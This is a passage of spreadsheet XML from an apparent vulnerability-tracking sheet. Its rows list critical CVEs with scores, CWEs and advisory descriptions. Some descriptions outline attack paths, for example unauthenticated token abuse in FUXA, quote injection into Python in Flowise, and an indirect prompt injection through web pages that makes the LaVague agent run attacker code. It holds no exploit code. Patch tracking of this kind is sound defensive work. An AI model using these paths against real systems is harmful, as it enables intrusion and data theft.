      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67367</t>
        </is>
      </c>
      <c r="C574" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D574" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L574" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in SIMOVE Fleetmanager V3.1 (All versions &lt; V3.1.13), SIMOVE Fleetmanager V3.2 (All versions &lt; V3.2.4), SIMOVE Fleetmanager V3.3 (All versions &lt; V3.3.2), SIMOVE Fleetmanager V4.0 (All versions &lt; V4.0.1), SIPLANT V1.7 (All versions), SIPLANT V2.2 (All versions), SIPLANT V3.0 (All versions), SIPLANT V3.1 (All versions &lt; V3.1.4). Affected devices do not properly validate and neutralize directory traversal sequences in the file-serving endpoint of the embedded HTTP server. This could allow an unauthenticated remote attacker to read arbitrary files from the underlying operating system without any credentials, potentially exposing sensitive data such as credential stores, private keys, and configuration secrets.</t>
        </is>
      </c>
      <c r="M574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67402</t>
        </is>
      </c>
      <c r="C575" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D575" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G575" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L575" s="5" t="inlineStr">
        <is>
          <t>An insecure Apache configuration in ConfigServer Security &amp; Firewall maps /usr/bin as CGI programs through the Messenger v3 HTTPS virtual host. A remote unauthenticated attacker whose address is blocked can request a mapped executable and run arbitrary commands as the Apache user. The vulnerability affects installations where CSF Messenger v3 and its HTTPS mode are enabled. WebPros addressed the vulnerability in version 16.31.</t>
        </is>
      </c>
      <c r="M575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67402</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67443</t>
        </is>
      </c>
      <c r="C576" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D576" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L576" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, the allowDashboard authorization gate in server/integrations/node-red/index.js calls authJwt.verify for /nodered without inspecting the decoded identity. When nodeRedEnabled is true, secureEnabled is true, and nodeRedAuthMode is secure, a remote unauthenticated attacker can obtain a signed guest token from POST /api/heartbeat and use it to access the RED.httpAdmin editor and flow deployment API. Because the Node-RED configuration has no second adminAuth gate, the attacker can deploy function nodes or invoke fuxa.runScript and runtime.scriptsMgr.runScript, gaining control of FUXA project data, configuration, scripts, filesystem-capable runtime helpers, and potentially operating-system commands when nodeRedUnsafeModules is enabled. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67443</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69255</t>
        </is>
      </c>
      <c r="C577" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D577" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G577" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L577" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent in packages/components/nodes/agents/CSVAgent/CSVAgent.ts extracted attacker-controlled CSV data with file.split(',').pop() and interpolated it directly into executable Python as base64_string = "${base64String}" before calling Pyodide. The validatePythonCodeForDataFrame() denylist only checked later LLM-generated code and did not validate this initial code block. An authenticated attacker could inject a closing quote followed by Python code, use Pyodide's js bridge to load Node.js child_process, and execute arbitrary operating system commands as root in the Flowise container. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69255</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70460</t>
        </is>
      </c>
      <c r="C578" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D578" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr">
        <is>
          <t>rsync 2.3.3 before 3.5.0 contains a path traversal vulnerability that allows a malicious sender to escape the module root by exploiting symlinks within the module file tree when using --partial-dir or --backup-dir options. Attackers with write access to place a symlink under the module root, or who can exploit a pre-existing trusted symlink, can direct file writes to locations outside the intended module root, achieving arbitrary file write relative to the module root parent.</t>
        </is>
      </c>
      <c r="M578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70460</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70478</t>
        </is>
      </c>
      <c r="C579" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D579" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L579" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the POST /api/v1/oauth2-credential/refresh/:credentialId endpoint is included in WHITELIST_URLS and requires no authentication. The endpoint decrypts the stored credential, sends a refresh request to the configured OAuth provider with the client secret and refresh token, and returns the refreshed access_token in the response body. An attacker with a credential ID can use the token to access the victim's connected service and can also exhaust refresh-token quota. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70478</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72836</t>
        </is>
      </c>
      <c r="C580" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D580" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G580" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L580" s="5" t="inlineStr">
        <is>
          <t>FileBrowser before 2.63.19 does not account for case-insensitive filesystems when checking home directory ownership during self-registration. When Signup and CreateUserDir are enabled and FileBrowser's root is on a case-insensitive filesystem (confirmed on Windows/NTFS), two self-registered usernames that differ only in letter case (e.g., CaseVictim and casevictim) are stored as distinct accounts but resolve to the same physical home directory, because the scope-ownership check compares the persisted scope as an exact case-sensitive string. A second registrant can therefore read, overwrite, and delete another account's files through authenticated HTTP endpoints, without needing an existing account or victim interaction.</t>
        </is>
      </c>
      <c r="M580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72836</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73414</t>
        </is>
      </c>
      <c r="C581" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D581" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G581" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-78</t>
        </is>
      </c>
      <c r="L581" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, getEscapeFunction in src/internal/win/cmd.js does not escape `(` and `)` when applications use the escape or escapeAll APIs on Windows with shell set to cmd.exe, or with shell set to true when CMD is the default. An attacker-controlled argument can break out of a parenthesized CMD construct and inject shell syntax depending on the original command, resulting in arbitrary command execution. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73414</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75856</t>
        </is>
      </c>
      <c r="C582" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D582" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L582" s="5" t="inlineStr">
        <is>
          <t>CodeWhale before 0.8.64 contains a server-side request forgery bypass vulnerability in DNS pinning logic that fails to prevent time-of-check-time-of-use attacks. Attackers can manipulate DNS responses to fail initial resolution checks and succeed on secondary requests, allowing requests to internal IP addresses and bypassing SSRF mitigations.</t>
        </is>
      </c>
      <c r="M582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75856</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77635</t>
        </is>
      </c>
      <c r="C583" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D583" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L583" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to versions 5.1.10, 5.2.15, and 5.3.7 on their respective release lines, FunctionsBuilder::jsonValue() with PostgresDriver is vulnerable to SQL injection when user-controlled data is supplied to the jsonPath parameter. This issue is fixed in versions 5.1.10, 5.2.15, and 5.3.7.</t>
        </is>
      </c>
      <c r="M583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77635</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77645</t>
        </is>
      </c>
      <c r="C584" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D584" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="L584" s="5" t="inlineStr">
        <is>
          <t>A critical remote code execution (RCE) vulnerability has been reported in PTC Windchill and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="M584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77645</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="C585" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D585" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G585" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L585" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="M585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82090</t>
        </is>
      </c>
      <c r="C586" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D586" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G586" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L586" s="5" t="inlineStr">
        <is>
          <t>Pocket through 8.33.0.0 allows XSS because "Save to Pocket" injects external HTML into the DOM.  JavaScript code can alter the application state via native bridge methods.</t>
        </is>
      </c>
      <c r="M586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82090</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84189</t>
        </is>
      </c>
      <c r="C587" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D587" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr">
        <is>
          <t>LibreNMS through 26.4.0 renders JSON fields (name, ip, model, author, commit message) returned by the admin-configurable Oxidized integration URL (oxidized.url) into the device showconfig page without applying htmlspecialchars(). An administrator who points the Oxidized URL at an attacker-controlled server (SSRF) can cause it to return malicious JSON, resulting in stored/persistent cross-site scripting affecting all users who view any device's showconfig tab. Fixed in 26.7.0.</t>
        </is>
      </c>
      <c r="M587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84189</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84197</t>
        </is>
      </c>
      <c r="C588" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D588" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G588" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297, CWE-300</t>
        </is>
      </c>
      <c r="L588" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t>
        </is>
      </c>
      <c r="M588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85427</t>
        </is>
      </c>
      <c r="C589" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D589" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L589" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos pAntler through 10.0.1 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary programs by publishing a crafted MISSION_FILE message to the MOOSDB. Attackers can publish a mission file containing malicious Run entries that pAntler parses and executes via execvp() without authentication validation.</t>
        </is>
      </c>
      <c r="M589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85427</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85614</t>
        </is>
      </c>
      <c r="C590" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D590" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L590" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains an unauthenticated server-side request forgery vulnerability in the GET /tools/site-checker endpoint that accepts a fully client-controlled URL parameter with no private IP filtering or DNS-rebinding protection. Attackers can make the OpenPanel server issue requests to internal services, localhost, and cloud metadata endpoints, reading internal HTTP response titles, headers, status codes, and SSL certificate information.</t>
        </is>
      </c>
      <c r="M590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85614</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85625</t>
        </is>
      </c>
      <c r="C591" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D591" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G591" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L591" s="5" t="inlineStr">
        <is>
          <t>sift (sift.js) 17.1.3 enumerates query keys with for...in, which walks the object prototype chain, and dispatches any matched operator key including $where. The $where operation compiles a string value into a function using new Function unless CSP_ENABLED is set (not set by default). As a result, if a prototype-pollution primitive elsewhere in the process sets Object.prototype.$where to a malicious string, even benign filter calls such as sift({}) execute arbitrary JavaScript. Additionally, passing an untrusted query object containing a string $where directly to sift results in code execution under the default configuration.</t>
        </is>
      </c>
      <c r="M591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85625</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85694</t>
        </is>
      </c>
      <c r="C592" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D592" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G592" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L592" s="5" t="inlineStr">
        <is>
          <t>LaVague 0.2.35 contains a remote code execution vulnerability in PythonFromMarkdownExtractor.extract_as_object that evaluates untrusted language model output derived from web page content. Attackers can inject malicious Python code through web pages using indirect prompt injection to execute arbitrary code on the operator's host without review.</t>
        </is>
      </c>
      <c r="M592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85694</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86117</t>
        </is>
      </c>
      <c r="C593" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D593" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L593" s="5" t="inlineStr">
        <is>
          <t>Coolify through 4.3.17 contains an authentication bypass vulnerability in the OAuth callback handler that signs users into existing accounts based solely on email address without verifying provider assertions or binding OAuth identities. Attackers can register a victim's email address on any enabled OAuth provider to obtain authenticated sessions as that user, bypassing password requirements and two-factor authentication.</t>
        </is>
      </c>
      <c r="M593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86117</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86426</t>
        </is>
      </c>
      <c r="C594" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D594" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G594" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H594" s="5" t="inlineStr"/>
